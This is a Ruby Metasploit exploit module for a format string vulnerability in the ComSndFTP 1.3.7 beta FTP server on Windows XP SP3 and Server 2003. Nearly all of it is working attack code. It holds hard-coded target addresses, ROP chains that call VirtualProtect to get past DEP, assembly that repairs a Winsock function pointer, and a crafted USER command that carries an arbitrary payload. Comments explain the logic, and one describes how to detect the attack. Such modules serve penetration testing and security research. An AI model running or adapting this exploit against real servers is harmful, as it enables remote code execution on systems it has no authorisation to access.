##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata. Two hard-coded targets are defined; each target hash
  # supplies the values +exploit+ reads via target['Functionpointer'],
  # target['Functionaddress'], target['Pivot'] and target['Pad'].
  #
  # @param info [Hash] module info merged through +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability',
        'Description' => %q{
          This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially
          crafted format string specifier as a username. The crafted username is sent to the server to
          overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer
          is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.
          The SEH exit function is preferred so that the administrators are not left with an unhandled
          exception message. When using the meterpreter payload, the process will never die, allowing
          for continuous exploitation.
        },
        'Author' => [
          'ChaoYi Huang <ChaoYi.Huang[at]connect.polyu.hk>', # vuln discovery + poc
          'rick2600 <rick2600[at]corelan.be>', # msf module (target XP)
          'mr_me <mr_me[at]corelan.be>', # msf module (target 23k)
          'corelanc0d3r <peter.ve[at]corelan.be>' # msf module
        ],
        'Arch' => [ ARCH_X86 ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2012-10055'],
          # When a DoS is NOT a DoS
          [ 'OSVDB', '82798'],
          [ 'EDB', '19024']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'seh'
        },
        'Platform' => ['win'],
        'Privileged' => false,
        'Payload' => {
          'Space' => 1000,
          'BadChars' => "\x00\x0a\x0d",
          'StackAdjustment' => -3500,
          'DisableNops' => true
        },
        # Every address below is a fixed, build-specific value (no ASLR on these
        # OS releases); a different service or DLL build is not covered.
        'Targets' => [
          [
            'Windows XP SP3 - English',
            {
              'Functionpointer' => 0x71AC4050, # winsock pointer
              'Functionaddress' => 0x71AB2636, # the repair address
              'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn
              'Pad' => 568
            }
          ],
          [
            'Windows Server 2003 - English',
            {
              'Functionpointer' => 0x71C14044, # winsock pointer
              'Functionaddress' => 0x71C02661, # the repair address
              'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn
              'Pad' => 568
            }
          ]
        ],
        'DisclosureDate' => '2012-06-08',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(21),
      ]
    )
  end

  # Fingerprints the service from its greeting alone; nothing is sent to the
  # server. +validate+ begins with "220 " (an FTP welcome reply) and continues
  # with a fixed run of non-ASCII bytes terminated by CRLF.
  #
  # @return [Exploit::CheckCode] Vulnerable only on an exact banner match;
  #   Safe for any other or empty banner. Because the comparison is exact,
  #   a build with a different or localized greeting is reported as Safe
  #   whether or not it is affected.
  def check
    connect
    banner = sock.get_once || "" # get_once may return nil; fall back to an empty string
    disconnect

    validate = "\x32\x32\x30\x20\xbb\xb6\xd3\xad\xb9"
    validate << "\xe2\xc1\xd9\x46\x54\x50\xb7\xfe\xce"
    validate << "\xf1\xc6\xf7\x21\x0d\x0a"

    if banner.to_s == validate
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  # Random filler dword for ROP slots whose contents are irrelevant.
  #
  # @param n [Integer] number of random alpha bytes to draw; every caller in
  #   this file uses the default. "V" unpacks one 32-bit little-endian
  #   unsigned value, so n < 4 would yield nil rather than an Integer.
  # @return [Integer] the first four random bytes read as a little-endian dword
  def junk(n = 4)
    return rand_text_alpha(n).unpack("V").first
  end

  # Builds the malformed USER argument and sends it once.
  #
  # Detection note: the trigger is a single FTP USER command whose argument
  # carries printf-style specifiers ("%<decimal>x", 208 consecutive "%p" and
  # a "%n") followed by binary data, in a line of roughly 2 KB; a normal
  # username contains none of these.
  #
  # @return [void]
  def exploit
    rop = '' # stays empty if target.name matches neither branch below
    if target.name =~ /Server 2003/
      # C:\WINDOWS\system32\msvcrt.dll v7.0.3790.3959
      rop = [
        0x77be3adb, # pop eax ; retn
        0x77ba1114, # <- *&VirtualProtect()
        0x77bbf244, # mov eax,[eax] ; pop ebp ; retn
        junk,
        0x77bb0c86, # xchg eax,esi ; retn
        0x77be3adb, # pop eax ; retn
        0xFFFFFBFF, # dwSize
        0x77BAD64D, # neg eax ; pop ebp ; retn
        junk,
        0x77BBF102, # xchg eax,ebx ; add [eax],al ; retn
        0x77bbfc02, # pop ecx ; retn
        0x77bef001, # ptr that is w+
        0x77bd8c04, # pop edi ; retn
        0x77bd8c05, # retn
        0x77be3adb, # pop eax ; retn
        0xFFFFFFC0, # flNewProtect
        0x77BAD64D, # neg eax ; pop ebp ; retn
        0x77be2265, # ptr to 'push esp ; ret'
        0x77BB8285, # xchg eax,edx ; retn
        0x77be3adb, # pop eax ; retn
        0x90909090, # nops
        0x77be6591, # pushad ; add al,0ef ; retn
      ].pack("V*")

    elsif target.name =~ /XP SP3/
      # C:\WINDOWS\system32\msvcrt.dll v7.0.2600.5512
      rop = [
        0x77C21D16, # pop eax ; retn
        0x77C11120, # <- *&VirtualProtect()
        0x77C2E493, # mov eax,[eax] ; pop ebp ; retn
        junk,
        0x77C21891, # pop esi ; retn
        0x77C5D010, # ptr that is w+
        0x77C2DD6C, # xchg eax,esi ; add [eax],al; retn
        0x77C21D16, # pop eax ; retn
        0xFFFFFBFF, # dwSize
        0x77C1BE18, # neg eax ; pop ebp ; retn
        junk,
        0x77C2362C, # pop ebx ; retn
        0x77C5D010, # ptr that is w+
        0x77C2E071, # xchg eax,ebx ; add [eax],al ; retn
        0x77C1F519, # pop ecx ; retn
        0x77C5D010, # ptr that is w+
        0x77C23B47, # pop edi ; retn
        0x77C23B48, # retn
        0x77C21D16, # pop eax ; retn
        0xFFFFFFC0, # flNewProtect
        0x77C1BE18, # neg eax ; pop ebp ; retn
        0x77C35459, # ptr to 'push esp ; ret'
        0x77C58FBC, # xchg eax,edx ; retn
        0x77C21D16, # pop eax ; retn
        0x90909090, # nops
        0x77C567F0, # pushad ; add al,0ef ; retn
      ].pack("V*")
    end

    # Assembly source (text); it is assembled with Metasm further down.
    stage1 = %Q{
      mov eax, #{target['Functionpointer']}
      mov ecx, #{target['Functionaddress']}
      mov [eax], ecx
    }

    offset_wp = rand_text_alphanumeric(1)
    pivot = target['Pivot']
    # NOTE(review): stage1.length is the length of the assembly *source text*,
    # not of the assembled bytes appended below, so the "2000 - offset" filler
    # makes the total only approximately 2000 bytes.
    offset = target['Pad'] + rop.length + stage1.length + payload.encoded.length

    attackstring = rand_text_alphanumeric(7)
    attackstring << [target['Functionpointer']].pack('V')
    attackstring << "%#{pivot}x" # special pointer to our pivot (interpolated as a decimal width)
    attackstring << "%p" * 208 + "#{offset_wp}%n" # format specifiers to read and write the function pointer ("*" binds before "+")
    attackstring << rand_text_alphanumeric(target['Pad'])
    attackstring << rop
    attackstring << Metasm::Shellcode.assemble(Metasm::Ia32.new, stage1).encode_string
    attackstring << payload.encoded
    attackstring << rand_text_alphanumeric(2000 - offset)
    attackstring << "\r\n"

    sploit = "USER #{attackstring}\r\n"

    print_status("Triggering overflow...")
    connect
    sock.get_once(1024) # consume the greeting before sending
    sock.put(sploit)
    select(nil, nil, nil, 2) # Kernel#select with no descriptors: a 2 s pause
    handler
    disconnect
  end
end